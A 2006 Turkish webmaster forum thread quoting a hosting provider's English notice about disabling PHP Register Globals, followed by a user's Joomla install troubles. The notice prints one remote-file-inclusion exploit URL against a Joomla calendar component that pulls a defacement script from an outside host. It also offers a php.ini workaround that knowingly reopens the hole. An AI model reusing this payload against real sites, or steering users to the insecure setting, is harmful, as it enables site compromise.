server configuration change - Google Fan Webmaster Forum
Google Fan Webmaster Forum  

Geri Dön   Google Fan Webmaster Forum > Google & Msn-Yahoo kardeşler > Makale & Çeviri yazılar

Makale & Çeviri yazılar Paylaşmak istediginiz makaleler yada çeviri yazılar.

Cevapla
 
LinkBack Konu Seçenekleri
  #1 (permalink)  
Eski 26-09-2006, 05:22:23
neo neo isimli üyemiz çevrimdışıdır. (Offline)
 
İzmir Şubesi
Yaş: 24
Mesajlar: 1.335
Thanks: 0
Thanked 0 Times in 0 Posts
iTrader Puanı: (1)
iTrader Feedback: (100%)
Rep puanı: 44
neo isimli üyemiz hakkına hiçbir bilgimiz yok.
neo - AİM üzerinden Mesaj gönder neo - MSN üzerinden Mesaj gönder neo - YAHOO üzeri ndenMesaj gönder
Tanımlı server configuration change

Arkadaşlar şimdi bu yazıda özetle ne diyor php global disable edilmiş anladığım kadarı ile bunun dışında önemli birşey yazıyor mu ?


We will be making a server configuration change related to PHP Register Globals at the date below. If you are NOT using PHP for your website you can disregard this notice. Currently PHP Register Globals is set to ON across our entire network of servers and will be changed to OFF. You will find a mini FAQ regarding this change below.

Server: Jackson
Change Date: Saturday September 30, 2006

Why are we making this change?

When Register Globals is ON, you can overwrite variables in PHP scripts by appending them to the URL, e.g. script.php?myvar=42 would define a variable myvar with the value of 42. Depending on how your script works this could be a security risk which was the case with many of the scripts within Fantastcio being hacked/compromised.

An example was Mambo/Joomla scripts being exploited by including the following in the requested URL:

components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://*****.com/oki/lol.txt?

The example above shows how easy it is to call an external script by using the calender component in Jooma to deface the website. PHP has set Register Globals default value to OFF since version 4.2.0 as noted here in the first line: http://us3.php.net/register_globals.

What can happen as a result of this change?

Old/outdated scripts still depending on Register Globals to be ON will have problems as those scripts need Register Globals to be on in order to work.

What can be done to prevent/resolve any problems caused as a result of this change?

Most scripts have dropped the need of Register Globals to be ON or have custom workarounds to this issue. Upgrading to the latest version of the script could possibly resolve any problems caused by this change. We also recommend contacting your script developer if you're unsure to see if Register Globals turned ON is a requirement. Other solutions include:

1- Contacting your script developer to make changes to the script so it does not rely on Register Globals to be enabled.

2- If your scripts need Register Globals enabled for the use of GET/POST/COOKIE variables then you can add the following in the fileheader:

import_request_variables('GPC');

If you need other variables like SERVER use the function extract().

3- If you need Register Globals ON then you can upload a custom php.ini file in your scripts directory to negate this change (this means your scripts will be vulnerable to being exploited). You can find a custom php.ini file at the URL below with Register Globals turned ON. Simply upload it to your scripts directory and name it php.ini to override the change on the server.

http://www.hostingzoom.com/phpini.txt
__________________
Çok Güzel Scriptler Burada
Alıntı ile Cevapla
  #2 (permalink)  
Eski 12-10-2006, 12:13:48
neo neo isimli üyemiz çevrimdışıdır. (Offline)
 
İzmir Şubesi
Yaş: 24
Mesajlar: 1.335
Thanks: 0
Thanked 0 Times in 0 Posts
iTrader Puanı: (1)
iTrader Feedback: (100%)
Rep puanı: 44
neo isimli üyemiz hakkına hiçbir bilgimiz yok.
neo - AİM üzerinden Mesaj gönder neo - MSN üzerinden Mesaj gönder neo - YAHOO üzeri ndenMesaj gönder
Tanımlı

ben php ini dosyasını attım ama olmadı
joomla da bileşen yükleyemiyorum
__________________
Çok Güzel Scriptler Burada
Alıntı ile Cevapla
  #3 (permalink)  
Eski 12-10-2006, 13:14:18
neo neo isimli üyemiz çevrimdışıdır. (Offline)
 
İzmir Şubesi
Yaş: 24
Mesajlar: 1.335
Thanks: 0
Thanked 0 Times in 0 Posts
iTrader Puanı: (1)
iTrader Feedback: (100%)
Rep puanı: 44
neo isimli üyemiz hakkına hiçbir bilgimiz yok.
neo - AİM üzerinden Mesaj gönder neo - MSN üzerinden Mesaj gönder neo - YAHOO üzeri ndenMesaj gönder
Tanımlı

arkadaşlar biri şu yaızyı çevirebilir mi ?
"
joomla da modül ve companent yükleyemiyorum

daha önce sorunsuz yüklüyordum.

sanırım server da yapılan yeni değişiklikten dolayı olmuyor (register globals on)

tarif ettiğiniz gibi phpini.text doyasını php.ini yapıp public_html içine attım ama yine problemim devam ediyor.

modül ve companent yüklenmiyor."
__________________
Çok Güzel Scriptler Burada
Alıntı ile Cevapla
Cevapla


Konuyu Toplam 1 üye okuyor. (0 Kayıtlı üye ve 1 Misafir)
 
Konu Seçenekleri

Yetkileriniz
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-KodlarıKapalı
Trackbacks are Açık
Pingbacks are Açık
Refbacks are Açık

Bütün Zaman Ayarları WEZ +3 olarak düzenlenmiştir. Şu Anki Saat: 14:49:02 .


 
Telif Hakları vBulletin v3.7.2 © 2000-2008, ve Jelsoft Enterprises Ltd.'e Aittir.
Hosted by Radore Hosting

“İnsanların en hayırlısı, insanlara faydalı olandır”. H.Ş

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195